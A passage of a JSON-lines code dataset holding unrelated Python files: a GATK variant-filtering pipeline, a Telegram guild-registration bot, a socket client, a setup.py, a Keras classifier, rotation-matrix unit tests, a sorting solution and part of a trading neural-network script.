\"+vsqr_output\r\nparallel_command([comm], 1, temp_dir+\"/\", 'ApplyVQSR.log') #n=2\r\n\r\n#os.remove(gvcf_output)\r\nprint(comm)\r\nprint(\"\\n\")\r\n\r\n#VariantRecalibrator INDELS\r\nprint(\"\\n\")\r\nprint(\"VariantRecalibrator INDELS\")\r\ncomm = java+' -Xmx10g -jar '+gatk+' VariantRecalibrator -R '+BWAindex+\" -V \"+vfilt_output+\" -tranche 100.0 -tranche 99.9 -tranche 99.5 \" \\\r\n \"-tranche 99.0 -tranche 90.0 -mode INDEL --tranches-file \"+temp_dir+pname+\"_INDEL.tranches --rscript-file 
\"+temp_dir+pname+\"_INDEL.plots.R \" \\\r\n \"--resource mills,known=false,training=true,truth=true,prior=12.0:\"+mills+\" --resource dbsnp,known=true,training=\" \\\r\n \"false,truth=false,prior=2.0:\"+dbsnp+\" -an QD -an MQ -an MQRankSum -an ReadPosRankSum -an FS -an SOR --output \"+vrecal2_output\r\nparallel_command([comm], 1, temp_dir+\"/\", 'VariantRecalibrator_INDEL.log') #n=2\r\n\r\n#os.remove(gvcf_output)\r\nprint(comm)\r\nprint(\"\\n\")\r\n\r\n#ApplyVQSR INDELS\r\nprint(\"\\n\")\r\nprint(\"ApplyVQSR INDELS\")\r\ncomm = java+' -Xmx10g -jar '+gatk+' ApplyVQSR -R '+BWAindex+\" -mode INDEL --truth-sensitivity-filter-level 98.0 -V \"+vsqr_output+\" \" \\\r\n \"--tranches-file \"+temp_dir+pname+\"_INDEL.tranches --recal-file \"+vrecal2_output+\" -O \"+vsqr_final_output\r\nparallel_command([comm], 1, temp_dir+\"/\", 'ApplyVQSR_INDEL.log') #n=2\r\n\r\nprint(comm)\r\nprint(\"\\n\")\r\n\r\n#VariantAnnotator\r\nprint(\"\\n\")\r\nprint(\"Variant Annotator\")\r\ncomm = java+' -Xmx10g -jar '+gatk+' VariantAnnotator -R '+BWAindex+\" -V \"+vsqr_final_output+\" \" \\\r\n \"--dbsnp \"+refknownsitesSNPS+\" -O \"+vsqr_final_annotated_output\r\nparallel_command([comm], 1, temp_dir+\"/\", 'variantannotator.log') #n=2\r\n\r\nprint(comm)\r\nprint(\"\\n\")","sub_path":"pipeline_filter_vqsr_jointvcf_v1.1.py","file_name":"pipeline_filter_vqsr_jointvcf_v1.1.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"456298576","text":"import pymongo\nfrom pymongo import MongoClient\nimport re\nimport requests\nimport json\nfrom const import *\n\nmongo_client = MongoClient()\nmongo_db = mongo_client.darth\ncollection_users = mongo_db.users\ncollection_users_twin = mongo_db.users_twin\ncollection_stats = mongo_db.users_stats\n\n# mongo_db.users\n# {'user': telega_username, 'ally_code': ally_code, 'swgoh_name': swgoh_name}\n\n# mongo_db.users_twin\n# {'user': telega_username, 'ally_code': ally_code, 'swgoh_name': swgoh_name}\n\ndef handler_reg(bot,message,my_logger):\n\n\ttry:\n\n\t\tRREG = False\n\t\tif (message.text.startswith('!rreg') or message.text.startswith('!ррег')) and message.from_user.id in ADMINS:\n\t\t\tRREG = True # админский бэкдор для форсированной регистрации !rreg tgusername allycode nick name name name in game\n\n\t\tmsg = \"\"\n\t\tally_code = False\n\t\ttelega_username = False\n\t\ttele_id = None\n\n\t\ts = message.text.split()\n\n\t\tif len(s) == 2:\n\t\t\t# передано только 1 параметр, предполагаем что это игрок регистрирует сам себя и указал ally code\n\t\t\tif message.from_user.username is not None: # у игрока установлен username в телеге\n\t\t\t\tif re.match(r\"(\\D*\\d){9}\", s[1]) and len(s[1]) == 9: # проверим что код = девятизначное число\n\t\t\t\t\tally_code = s[1]\n\t\t\t\t\ttelega_username = message.from_user.username\n\t\t\t\t\ttele_id = message.from_user.id\n\t\t\t\telse:\n\t\t\t\t\tbot.reply_to(message, f'Регистрация невозможна, код союзника указан неверно (правильный формат - 123456789)')\n\t\t\t\t\tmy_logger.info(\"Ally code in wrong format\")\n\t\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tbot.reply_to(message,f\"Регистрация невозможна, у вас не задан username в телеграме! 
Задать можно в настройках приложения\")\n\t\t\t\tmy_logger.info(\"Username is None\")\n\t\t\t\treturn\n\n\t\t\t# на выходе имеем установленный ally_code и telega_username\n\n\t\telif len(s)==3:\n\t\t\t# в !reg передано два параметра\n\t\t\tif re.match(r\"(\\D*\\d){9}\", s[2]) and len(s[2]) == 9: # проверим что код = девятизначное число\n\t\t\t\tally_code = s[2]\n\t\t\t\ttelega_username = s[1].replace(\"@\",\"\")\n\t\t\telse:\n\t\t\t\tbot.reply_to(message, f'Регистрация невозможна, код союзника указан неверно (правильный формат - 123456789)')\n\t\t\t\tmy_logger.info(\"Ally code in wrong format\")\n\t\t\t\treturn\n\n\t\t\t# на выходе имеем установленный ally_code и telega_username\n\n\t\telif len(s)>3 and RREG: # админ передал 4 параметра - !rreg tgusername allycode nick name name name in game\n\n\t\t\tif re.match(r\"(\\D*\\d){9}\", s[2]) and len(s[2]) == 9: # проверим что код = девятизначное число\n\t\t\t\tally_code = s[2]\n\t\t\t\ttelega_username = s[1].replace(\"@\",\"\")\n\t\t\t\tgame_nick = \"\"\n\t\t\t\tfor i in range(3,len(s)):\n\t\t\t\t\tgame_nick += f\"{s[i]} \"\n\t\t\t\tgame_nick = game_nick.rstrip()\n\t\t\t\tbot.reply_to(message, f'Попытка зарегистрировать {telega_username} с кодом {ally_code} и ником в игре \"{game_nick}\"')\n\n\t\telse:\n\t\t\tbot.reply_to(message, 'Регистрация невозможна! Корректное использование:\\n`!reg имяВТелеге кодСоюзника` или `!reg кодСоюзника` для регистрации себя', parse_mode=\"Markdown\")\n\t\t\tmy_logger.info(\"Registration not possible, wrong command format\")\n\n\n\t\t# далее исполняется только если код союзника = девятизначное число в ally_code, а также установлен telega_username\n\t\tif ally_code and telega_username:\n\t\t\t\n\t\t\tif not RREG: # получим данные из swgoh.gg\n\t\t\t\tr = requests.get(f'{SWGOH_URL}/{ally_code}')\n\t\t\t\tjdata = r.json()\n\t\t\t\tif jdata:\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tbot.reply_to(message, f'Регистрация невозможна, указанный код союзника не найден на https://swgoh.gg/p/{ally_code}/')\n\t\t\t\t\tmy_logger.info(\"Ally code not found\")\n\t\t\t\t\treturn\n\t\t\t\tplayer_name = jdata['data']['name']\n\t\t\telif game_nick is not None: # это запрос на регистрацию от админа с указанным game_nick, который уже должен быть заполнен\n\t\t\t\tplayer_name = game_nick\n\t\t\telse:\n\t\t\t\tbot.reply_to(message, f'Регистрация невозможна, указанный код союзника не найден на https://swgoh.gg/p/{ally_code}/')\n\t\t\t\tmy_logger.info(\"Ally code not found\")\n\t\t\t\treturn\n\n\t\t\t# теперь так же имеем player_name\n\n\t\t\t# проверим, может игрок уже зарегистрирован\n\t\t\tfound_user = collection_users.find_one({'user': telega_username})\n\t\t\tif found_user: # действительно, уже \n\t\t\t\tmsg = f'Пользователь {telega_username} уже зарегистрирован! '\n\t\t\t\tmsg += f'Если нужно изменить информацию - сначала надо удалить пользователя через команду `!forget {telega_username}`'\n\t\t\t\tbot.send_message(message.chat.id, msg, parse_mode=\"Markdown\")\n\t\t\t\tmy_logger.info(\"User already exists, forget first\")\n\t\t\telse: # регистрируем нового пользователя\n\t\t\t\tnew_user = {'user': telega_username, 'ally_code': ally_code, 'swgoh_name': player_name}\n\t\t\t\tif tele_id is not None:\n\t\t\t\t\tnew_user['tele_id'] = tele_id\n\t\t\t\tcollection_users.insert_one(new_user)\n\t\t\t\tbot.send_message(message.chat.id, f'Пользователь {telega_username} успешно зарегистрирован! Найденное имя в SWGOH: {player_name}')\n\t\t\t\tmy_logger.info(f\"Registration successful! 
Found SWGOH name {player_name}\")\n\n\texcept Exception as e:\n\n\t\tbot.reply_to(message, \"Произошла ошибка, попробуйте позже!\")\n\t\tmy_logger.info(f\"Something went wrong during !reg: {e}\")\n\n\n\n\ndef handler_twin_reg(bot,message,my_logger):\n\n\t# бэкдор для регистрации двойника, доступен только админам\n\n\ttry:\n\n\t\tally_code = False\n\t\ttelega_username = False\n\n\t\ts = message.text.split()\n\n\t\tif len(s)>3: # должно быть передано не менее 4 параметров, последний из которых - имя в игре: !twinreg tgusername allycode nick name name name in game\n\n\t\t\tif re.match(r\"(\\D*\\d){9}\", s[2]) and len(s[2]) == 9: # проверим что код = девятизначное число\n\t\t\t\tally_code = s[2]\n\t\t\t\ttelega_username = s[1].replace(\"@\",\"\")\n\t\t\t\tgame_nick = \"\"\n\t\t\t\tfor i in range(3,len(s)):\n\t\t\t\t\tgame_nick += f\"{s[i]} \"\n\t\t\t\tgame_nick = game_nick.rstrip()\n\t\t\t\tbot.reply_to(message, f'Попытка зарегистрировать {telega_username} с кодом {ally_code} и ником в игре \"{game_nick}\"')\n\t\t\telse:\n\t\t\t\tbot.reply_to(message, 'Регистрация невозможна! Корректное использование:\\n`!twinreg username code nick_in_game', parse_mode=\"Markdown\")\n\t\t\t\tmy_logger.info(\"Registration not possible, wrong command format\")\n\n\t\telse:\n\t\t\tbot.reply_to(message, 'Регистрация невозможна! Корректное использование:\\n`!twinreg username code nick_in_game', parse_mode=\"Markdown\")\n\t\t\tmy_logger.info(\"Registration not possible, wrong command format\")\n\n\n\t\t# далее исполняется только если код союзника = девятизначное число в ally_code, а также установлен telega_username + game_nick\n\t\tif ally_code and telega_username and game_nick:\n\t\t\t\n\t\t\tnew_user = {'user': telega_username, 'ally_code': ally_code, 'swgoh_name': game_nick}\n\t\t\tcollection_users_twin.insert_one(new_user)\n\t\t\tbot.send_message(message.chat.id, f'Пользователь {telega_username} успешно зарегистрирован в качестве дубля! Имя в SWGOH: {game_nick}')\n\t\t\tmy_logger.info(f\"Twin registration successful! 
SWGOH name {game_nick}\")\n\n\n\texcept Exception as e:\n\n\t\tbot.reply_to(message, \"Произошла ошибка, попробуйте позже!\")\n\t\tmy_logger.info(f\"Something went wrong during !reg: {e}\")","sub_path":"handler_reg.py","file_name":"handler_reg.py","file_ext":"py","file_size_in_byte":8403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"318942602","text":"from socket import *\n\n# Parameters\nTCP_IP = 'localhost'\nTCP_PORT = 12003\nBUFFER_SIZE = 1024\n\n# Prepare a client socket\nclientSocket = socket(AF_INET, SOCK_STREAM)\nclientSocket.connect((TCP_IP, TCP_PORT))\n\n# Send message to GET HTML file\nMESSAGE = b'GET HelloWorld.html'\nclientSocket.send(MESSAGE)\n\n# GET the full content from the HTML file\nfull_content = ''\n\nwhile True:\n    data = clientSocket.recv(BUFFER_SIZE)\n    if not data:\n        break\n    data = data.decode('utf-8')\n    full_content += data\n    \nwith open('files_from_server/HelloWorld.html', 'w') as f:\n    f.write(full_content)\n    \nprint(\"received data:\", full_content)\n\n# Close Client\nclientSocket.close()\nprint(\"\\n\\nClient close successfully!\")\n\n","sub_path":"P1/WebServer/web_client.py","file_name":"web_client.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"417590443","text":"from setuptools import setup, find_packages\n\n__author__ = 'Matt Ryan '\n\n\nwith open(\"README.md\", \"r\") as fh:\n    long_description = fh.read()\n\n\ndef parse_reqs(file_path):\n    with open(file_path, 'rt') as fobj:\n        lines = map(str.strip, fobj)\n        lines = filter(None, lines)\n        # keep only real requirement lines, dropping comment lines\n        lines = filter(lambda x: not x.startswith(\"#\"), lines)\n        return tuple(lines)\n\n\nsetup(\n    name=\"napalm-edgeswitch\",\n    version=\"0.0.2\",\n    packages=find_packages(),\n    author=\"Juan Gomez\",\n    author_email=\"jgomez@phicus.es\",\n    description=\"Network Automation and Programmability Abstraction Layer driver for Ubiquiti Edgeswitch using SSH\",\n    long_description_content_type=\"text/markdown\",\n    long_description=long_description,\n    classifiers=[\n        'Topic :: Utilities',\n        'Programming Language :: Python',\n        'Programming Language :: Python :: 3',\n        'Programming Language :: Python :: 3.6',\n        'Programming Language :: Python :: 3.7',\n        'Operating System :: POSIX :: Linux',\n        'Operating System :: MacOS',\n    ],\n    url=\"https://github.com/johnbarneta/napalm-edgeswitch\",\n    include_package_data=True,\n    install_requires=(\n        'napalm==2.*',\n        'netmiko==2.*',\n    ),\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"382642182","text":"import keras\nfrom keras import layers\nfrom keras.models import Sequential, load_model\nfrom keras.preprocessing.image import load_img, img_to_array\nimport numpy as np\nbatch_size = 32\nimg_height = 180\nimg_width = 180\n# the model's first layer already rescales to [0, 1], so the generator must not rescale again\ntrain_dg = keras.preprocessing.image.ImageDataGenerator(validation_split=0.2)\ntrain_generator = train_dg.flow_from_directory(\n    'Large', target_size=(img_height, img_width),\n    class_mode='sparse', subset='training', seed=123)\nvalidation_generator = train_dg.flow_from_directory(\n    'Large', target_size=(img_height, img_width),\n    class_mode='sparse', subset='validation', seed=123)\nclass_names = list(train_generator.class_indices.keys())\nnum_classes = len(class_names)\n\nmodel = Sequential([\n    layers.experimental.preprocessing.Rescaling(1./255, input_shape=(img_height, 
img_width, 3)),\n    layers.Conv2D(16, 3, padding='same', activation='relu'),\n    layers.MaxPooling2D(),\n    layers.Conv2D(32, 3, padding='same', activation='relu'),\n    layers.MaxPooling2D(),\n    layers.Conv2D(64, 3, padding='same', activation='relu'),\n    layers.MaxPooling2D(),\n    layers.Flatten(),\n    layers.Dense(128, activation='relu'),\n    layers.Dense(num_classes)\n])\nmodel.compile(optimizer='adam',\n              loss=keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n              metrics=['accuracy'])\nepochs=10\nhistory = model.fit(\n    train_generator,\n    validation_data=validation_generator,\n    epochs=epochs\n)\nmodel.save('model.h5')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"107448057","text":"from numpy.testing import assert_allclose, run_module_suite\nimport numpy as np\nfrom pyins import dcm\n\n\ndef test_from_basic():\n    A1 = dcm.from_basic(1, 30)\n    A1_true = np.array([\n        [1, 0, 0],\n        [0, 0.5 * 3**0.5, -0.5],\n        [0, 0.5, 0.5 * 3**0.5]\n    ])\n    assert_allclose(A1, A1_true, rtol=1e-10)\n\n    A2 = dcm.from_basic(2, 30)\n    A2_true = np.array([\n        [0.5 * 3 ** 0.5, 0, 0.5],\n        [0, 1, 0],\n        [-0.5, 0, 0.5 * 3**0.5]\n    ])\n    assert_allclose(A2, A2_true, rtol=1e-10)\n\n    A3 = dcm.from_basic(3, 30)\n    A3_true = np.array([\n        [0.5 * 3**0.5, -0.5, 0],\n        [0.5, 0.5 * 3**0.5, 0],\n        [0, 0, 1]\n    ])\n    assert_allclose(A3, A3_true, rtol=1e-10)\n\n    A4 = dcm.from_basic(3, [30, 60])\n    A4_true = np.array([\n        [[0.5 * 3**0.5, -0.5, 0],\n         [0.5, 0.5 * 3**0.5, 0],\n         [0, 0, 1]],\n        [[0.5, -0.5 * 3**0.5, 0],\n         [0.5 * 3**0.5, 0.5, 0],\n         [0, 0, 1]]\n    ])\n    assert_allclose(A4, A4_true, rtol=1e-10)\n\n\ndef test_from_rv():\n    rv1 = np.array([1, 0, 0]) * np.pi / 3\n    A1 = dcm.from_rv(rv1)\n    A1_true = np.array([[1, 0, 0],\n                        [0, 0.5, -0.5 * np.sqrt(3)],\n                        [0, 0.5 * np.sqrt(3), 0.5]])\n    assert_allclose(A1, A1_true, rtol=1e-10)\n\n    rv2 = np.array([1, 1, 1]) * 1e-10\n    A2 = dcm.from_rv(rv2)\n    A2_true = np.array([[1, -1e-10, 1e-10],\n                        [1e-10, 1, -1e-10],\n                        [-1e-10, 1e-10, 1]])\n    assert_allclose(A2, A2_true, rtol=1e-10)\n\n    n = np.array([-0.5, 1/np.sqrt(2), 0.5])\n    theta = np.pi / 6\n    rv3 = n * theta\n    s = np.sin(theta)\n    c = np.cos(theta)\n\n    A3 = dcm.from_rv(rv3)\n    A3_true = np.array([\n        [(1-c)*n[0]*n[0] + c, (1-c)*n[0]*n[1] - n[2]*s,\n         (1-c)*n[0]*n[2] + s*n[1]],\n        [(1-c)*n[1]*n[0] + s*n[2], (1-c)*n[1]*n[1] + c,\n         (1-c)*n[1]*n[2] - s*n[0]],\n        [(1-c)*n[2]*n[0] - s*n[1], (1-c)*n[2]*n[1] + s*n[0],\n         (1-c)*n[2]*n[2] + c]\n    ])\n    assert_allclose(A3, A3_true, rtol=1e-10)\n\n    rv = np.empty((30, 3))\n    rv[:10] = rv1\n    rv[10:20] = rv2\n    rv[20:] 
\n\ndef test_dcm_rv_conversion():\n # Test conversions on random inputs.\n rng = np.random.RandomState(0)\n\n axis = rng.randn(20, 3)\n axis /= np.linalg.norm(axis, axis=1)[:, np.newaxis]\n angle = rng.uniform(-np.pi, np.pi, size=axis.shape[0])\n rv = axis * angle[:, np.newaxis]\n rv[::5] *= 1e-8\n\n A = dcm.from_rv(rv)\n rv_from_A = dcm.to_rv(A)\n assert_allclose(rv, rv_from_A, rtol=1e-10)\n\n rv = rv[:5]\n A = A[:5]\n rv_from_A = dcm.to_rv(A)\n assert_allclose(rv, rv_from_A, rtol=1e-10)\n\n\ndef test_dcm_quat_conversion():\n np.random.seed(0)\n h = np.random.uniform(0, 360, 20)\n p = np.random.uniform(-90, 90, 20)\n r = np.random.uniform(-180, 180, 20)\n\n As = dcm.from_hpr(h, p, r)\n for A in As:\n q = dcm.to_quat(A)\n Ac = dcm.from_quat(q)\n assert_allclose(Ac, A, rtol=1e-14, atol=1e-16)\n\n q = dcm.to_quat(As)\n Asc = dcm.from_quat(q)\n assert_allclose(Asc, As, rtol=1e-14, atol=1e-16)\n\n\ndef test_dcm_mrp_conversion():\n np.random.seed(1)\n h = np.random.uniform(0, 360, 100)\n p = np.random.uniform(-90, 90, 100)\n r = np.random.uniform(-180, 180, 100)\n\n As = dcm.from_hpr(h, p, r)\n for A in As:\n grp = dcm.to_mrp(A)\n Ac = dcm.from_mrp(grp)\n assert_allclose(Ac, A, rtol=1e-14, atol=1e-15)\n\n grp = dcm.to_mrp(As)\n Asc = dcm.from_mrp(grp)\n assert_allclose(Asc, As, rtol=1e-14, atol=1e-15)\n\n\ndef test_dcm_gibbs_conversion():\n np.random.seed(1)\n h = np.random.uniform(0, 360, 100)\n p = np.random.uniform(-90, 90, 100)\n r = np.random.uniform(-180, 180, 100)\n\n As = dcm.from_hpr(h, p, r)\n for A in As:\n grp = dcm.to_gibbs(A)\n Ac = dcm.from_gibbs(grp)\n assert_allclose(Ac, A, rtol=1e-14, atol=1e-15)\n\n grp = dcm.to_gibbs(As)\n Asc = dcm.from_gibbs(grp)\n assert_allclose(Asc, As, rtol=1e-14, atol=1e-15)\n\n\ndef test_from_hpr():\n hpr1 = [30, 0, 0]\n A_true1 = np.array([[np.sqrt(3)/2, 0.5, 0],\n [-0.5, np.sqrt(3)/2, 0],\n [0, 0, 1]])\n assert_allclose(dcm.from_hpr(*hpr1), A_true1, rtol=1e-10)\n\n hpr2 = np.rad2deg([1e-10, 3e-10, -1e-10])\n A_true2 = np.array([[1, 1e-10, -1e-10],\n [-1e-10, 1, -3e-10],\n [1e-10, 3e-10, 1]])\n assert_allclose(dcm.from_hpr(*hpr2), A_true2, rtol=1e-8)\n\n hpr3 = [45, -30, 60]\n A_true3 = np.array([\n [-np.sqrt(6)/8 + np.sqrt(2)/4, np.sqrt(6)/4,\n np.sqrt(2)/8 + np.sqrt(6)/4],\n [-np.sqrt(2)/4 - np.sqrt(6)/8, np.sqrt(6)/4,\n -np.sqrt(6)/4 + np.sqrt(2)/8],\n [-0.75, -0.5, np.sqrt(3)/4]\n ])\n assert_allclose(dcm.from_hpr(*hpr3), A_true3, rtol=1e-8)\n\n hpr = np.vstack((hpr1, hpr2, hpr3)).T\n A = np.array((A_true1, A_true2, A_true3))\n assert_allclose(dcm.from_hpr(*hpr), A, rtol=1e-8)\n\n\ndef test_to_hpr():\n A1 = np.identity(3)\n hpr1 = np.zeros(3)\n assert_allclose(dcm.to_hpr(A1), hpr1, atol=1e-10)\n\n A2 = np.array([[1, 1e-10, -2e-10],\n [-1e-10, 1, 3e-10],\n [2e-10, -3e-10, 1]])\n hpr2 = np.rad2deg([1e-10, -3e-10, -2e-10])\n assert_allclose(dcm.to_hpr(A2), hpr2, atol=1e-10)\n\n A3 = np.array([\n [1/np.sqrt(2), 0, 1/np.sqrt(2)],\n [0, 1, 0],\n [-1/np.sqrt(2), 0, 1/np.sqrt(2)]\n ])\n hpr3 = np.array([0, 0, 45])\n assert_allclose(dcm.to_hpr(A3), hpr3, rtol=1e-10)\n\n A4 = np.array([[-1, 0, 0], [0, 0, -1], [0, -1, 0]])\n hpr4 = np.array([180, -90, 0])\n assert_allclose(dcm.to_hpr(A4), hpr4, rtol=1e-10)\n\n A = np.empty((20, 3, 3))\n A[:5] = A1\n A[5:10] = A2\n A[10:15] = A3\n A[15:] = A4\n hpr = np.empty((20, 3))\n hpr[:5] = hpr1\n hpr[5:10] = hpr2\n hpr[10:15] = hpr3\n hpr[15:20] = hpr4\n\n ret = dcm.to_hpr(A)\n for i in 
range(3):\n assert_allclose(ret[i], hpr[:, i], rtol=1e-10)\n\n\ndef test_dcm_hpr_conversion():\n rng = np.random.RandomState(0)\n\n h = rng.uniform(0, 360, 20)\n p = rng.uniform(-90, 90, 20)\n r = rng.uniform(-180, 180, 20)\n\n A = dcm.from_hpr(h, p, r)\n h_r, p_r, r_r = dcm.to_hpr(A)\n\n assert_allclose(h, h_r, rtol=1e-10)\n assert_allclose(p, p_r, rtol=1e-10)\n assert_allclose(r, r_r, rtol=1e-10)\n\n\ndef test_from_llw():\n llw1 = np.array([90, -90, 0])\n A1 = np.identity(3)\n assert_allclose(dcm.from_llw(*llw1), A1, rtol=1e-10, atol=1e-10)\n assert_allclose(dcm.from_llw(*llw1[:2]), A1, rtol=1e-10, atol=1e-10)\n\n llw2 = np.array([90, -90, np.rad2deg(1e-9)])\n A2 = np.array([[1, -1e-9, 0], [1e-9, 1, 0], [0, 0, 1]])\n assert_allclose(dcm.from_llw(*llw2), A2, rtol=1e-10, atol=1e-10)\n\n llw3 = np.array([-30, -45, 90])\n A3 = np.array([[np.sqrt(2)/4, -np.sqrt(2)/2, np.sqrt(6)/4],\n [-np.sqrt(2)/4, -np.sqrt(2)/2, -np.sqrt(6)/4],\n [np.sqrt(3)/2, 0, -0.5]])\n\n assert_allclose(dcm.from_llw(*llw3), A3, rtol=1e-10, atol=1e-10)\n\n A4 = np.array([[2**0.5/2, 2**0.5/4, 6**0.5/4],\n [2**0.5/2, -2**0.5/4, -6**0.5/4],\n [0, 3**0.5/2, -0.5]])\n assert_allclose(dcm.from_llw(*llw3[:2]), A4, rtol=1e-10, atol=1e-10)\n\n llw = np.empty((15, 3))\n llw[:5] = llw1\n llw[5:10] = llw2\n llw[10:] = llw3\n A = np.empty((15, 3, 3))\n A[:5] = A1\n A[5:10] = A2\n A[10:] = A3\n assert_allclose(dcm.from_llw(*llw.T), A, rtol=1e-10, atol=1e-10)\n\n\ndef test_to_llw():\n A1 = np.identity(3)\n llw1 = np.array([90, 0, -90])\n assert_allclose(dcm.to_llw(A1), llw1, rtol=1e-10)\n\n A2 = np.array([[0, 0, 1], [1, 0, 0], [0, 1, 0]])\n llw2 = np.array([0, 0, 0])\n assert_allclose(dcm.to_llw(A2), llw2, atol=1e-10)\n\n A = np.empty((10, 3, 3))\n A[:5] = A1\n A[5:] = A2\n llw = np.empty((10, 3))\n llw[:5] = llw1\n llw[5:] = llw2\n\n ret = dcm.to_llw(A)\n for i in range(3):\n assert_allclose(ret[i], llw[:, i], rtol=1e-10, atol=1e-10)\n\n\ndef test_dcm_llw_conversion():\n rng = np.random.RandomState(0)\n\n lat = rng.uniform(-90, 90, 20)\n lon = rng.uniform(-180, 180, 20)\n wan = rng.uniform(-180, 180, 20)\n\n A = dcm.from_llw(lat, lon, wan)\n lat_r, lon_r, wan_r = dcm.to_llw(A)\n\n assert_allclose(lon_r, lon, rtol=1e-10)\n assert_allclose(lat_r, lat, rtol=1e-10)\n assert_allclose(wan_r, wan, rtol=1e-10)\n\n\ndef test_dcm_Spline():\n ht = [0, 45, 90]\n C = dcm.from_hpr(ht, 0, 0)\n t = [0, 45, 90]\n s = dcm.Spline(t, C)\n\n t_test = [0, 30, 60, 90]\n C_test = s(t_test)\n h, p, r = dcm.to_hpr(C_test)\n assert_allclose(h, [0, 30, 60, 90], rtol=1e-14, atol=1e-16)\n assert_allclose(p, 0, atol=1e-16)\n assert_allclose(r, 0, atol=1e-16)\n\n omega = np.rad2deg(s(t_test, 1))\n assert_allclose(omega[:, 0], 0, atol=1e-16)\n assert_allclose(omega[:, 1], 0, atol=1e-6)\n assert_allclose(omega[:, 2], -1)\n\n beta = np.rad2deg(s(t_test, 2))\n assert_allclose(beta, 0, atol=1e-16)\n\n t = np.linspace(0, 100, 101)\n ht = 10 * t + 5 * np.sin(2 * np.pi * t / 10)\n pt = 7 * t + 3 * np.sin(2 * np.pi * t / 10 + 2)\n rt = -3 * t + 3 * np.sin(2 * np.pi * t / 10 - 2)\n C = dcm.from_hpr(ht, pt, rt)\n s = dcm.Spline(t, C)\n\n Cs = s(t[::-1])\n assert_allclose(Cs[::-1], C)\n\n\ndef test_match_vectors():\n Cab_true = dcm.from_hpr(20, -10, 5)\n vb = np.array([\n [0, 1, 0],\n [0, 0, 1]\n ])\n va = vb.dot(Cab_true.T)\n\n Cab = dcm.match_vectors(va, vb)\n assert_allclose(Cab, Cab_true, atol=1e-16)\n\n Cab = dcm.match_vectors(va, vb, [200, 1])\n assert_allclose(Cab, Cab_true, atol=1e-16)\n\n rng = np.random.RandomState(0)\n vb = rng.rand(100, 3)\n vb /= 
np.linalg.norm(vb, axis=1)[:, None]\n va = vb.dot(Cab_true.T)\n Cab = dcm.match_vectors(va, vb)\n assert_allclose(Cab, Cab_true, atol=1e-16)\n\n\nif __name__ == '__main__':\n run_module_suite()\n","sub_path":"pyins/tests/test_dcm.py","file_name":"test_dcm.py","file_ext":"py","file_size_in_byte":10934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"261066023","text":"\nfrom functools import cmp_to_key\n\ndef compare(A, B):\n # order so that the concatenation A + B forms the larger number,\n # e.g. '3' + '30' = '330' > '30' + '3' = '303', so '3' sorts first\n ab = A + B\n ba = B + A\n if int(ab) > int(ba):\n return -1\n elif int(ab) < int(ba):\n return 1\n else:\n return 0\n\n\ndef solution(numbers):\n numbers = list(map(str, numbers))\n numbers.sort(key = cmp_to_key(compare))\n ret = ''.join(numbers)\n # strip leading zeros, e.g. [0, 0] -> '00' -> '0'\n while len(ret) > 1 and ret[0] == '0':\n ret = ret[1:]\n\n return ret\n","sub_path":"programmers/42746.py","file_name":"42746.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"621325418","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/8/26 9:12\n# @Author : Tony\n\"\"\"Neural network test case\"\"\"\nimport sys\n\nimport numpy as np\nfrom datetime import datetime\n\nfrom app.cta_strategy.neural_network import NeuralNetwork\nfrom trader.constant import Exchange, Interval\nfrom vnpy.trader.database import database_manager\n\n\ndef make_input_data(raw_data):\n input_max_high = max([x.high_price for x in raw_data])\n input_min_low = min([x.low_price for x in raw_data])\n input_price_range = input_max_high - input_min_low\n input_max_volume = max([x.volume for x in raw_data])\n\n def parse_price(price):\n return ((price - input_min_low) / input_price_range) + 0.001\n\n return np.array([[parse_price(x.high_price), parse_price(x.open_price), parse_price(x.low_price)\n , parse_price(x.close_price), x.volume / input_max_volume] for x in raw_data])\n\n\ndef make_target_data(raw_data, last_close):\n max_high = max([x.high_price for x in raw_data])\n target_percent = (max_high - last_close) / last_close\n\n target_data_label = np.zeros(output_nodes) + 0.01\n if target_percent > long_profit_percent: # open-long signal\n target_data_label[1] = 0.99\n elif target_percent < - short_profit_percent: # open-short signal\n target_data_label[2] = 0.99\n else:\n target_data_label[0] = 0.99\n\n return target_data_label, target_percent, max_high\n
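\n# A worked example of the labeling rule above (illustrative numbers, not\n# taken from the data): with last_close = 3500 and a 15-minute max_high of\n# 3510, target_percent = (3510 - 3500) / 3500 = 0.00286 > 0.002, so the label\n# becomes [0.01, 0.99, 0.01], i.e. index 1, the open-long class.\n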
\n\nif __name__ == '__main__':\n input_data_len = 100 # feed X one-minute K-line bars (high/open/low/close/volume) = X * 5 data points\n target_data_len = 15 # predict the high over the next 15 minutes\n long_profit_percent = 0.002 # 20/10000 profit minus 1.5/10000 * 2 commission = 17 yuan per trade\n short_profit_percent = 0.002 # 20/10000 profit minus 1.5/10000 * 2 commission = 17 yuan per trade\n\n input_nodes = input_data_len * 5\n hidden_nodes = input_data_len * 7\n output_nodes = 3\n learning_rate = 0.1\n\n symbol = 'rb1910'\n exchange = Exchange.SHFE\n interval = Interval.MINUTE\n start = datetime(2019, 6, 10)\n end = datetime.now()\n\n neuralNetwork = NeuralNetwork(input_nodes, hidden_nodes, output_nodes, learning_rate)\n print(\"run neural network\")\n\n bar_data = database_manager.load_bar_data(symbol, exchange, interval, start, end)\n bar_data_len = len(bar_data)\n print(f\"load bar data size {bar_data_len}, {interval}\")\n\n if bar_data_len < 1000:\n print(\"need more data >= 50000\")\n 